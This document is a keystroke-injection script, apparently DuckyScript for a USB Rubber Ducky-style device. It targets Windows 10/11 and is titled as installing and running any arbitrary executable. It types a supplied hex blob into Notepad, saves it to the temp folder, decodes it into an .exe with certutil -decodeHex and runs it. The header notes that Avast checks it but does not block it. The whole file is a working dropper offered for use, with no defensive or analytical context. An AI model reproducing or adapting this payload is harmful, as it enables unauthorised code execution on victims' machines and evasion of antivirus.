* ###########################################################################################
* #                                                                                         |
* # Title        : Install And Run Any Arbitrary Executable - No Internet And Root Needed   |
* # Author       : Aleff                                                                    |
* # Version      : 1.0                                                                      |
* # Category     : Execution                                                                |
* # Target       : Windows 10/11                                                            |
* #                                                                                         |
* ###########################################################################################


* Requirements:
*     - Nothing


* Note:
*     - Tested on Windows 11
*     - Running checked but not blocked by Avast antivirus


GUI r
DELAY 1000
STRING notepad.exe
ENTER
DELAY 2000

* Define here your hexadecimal code
STRING #HEX_CODE

DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRING "%TEMP%\example.hex"
ENTER
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRING certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
ENTER
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRING "%TEMP%\example.exe"
ENTER
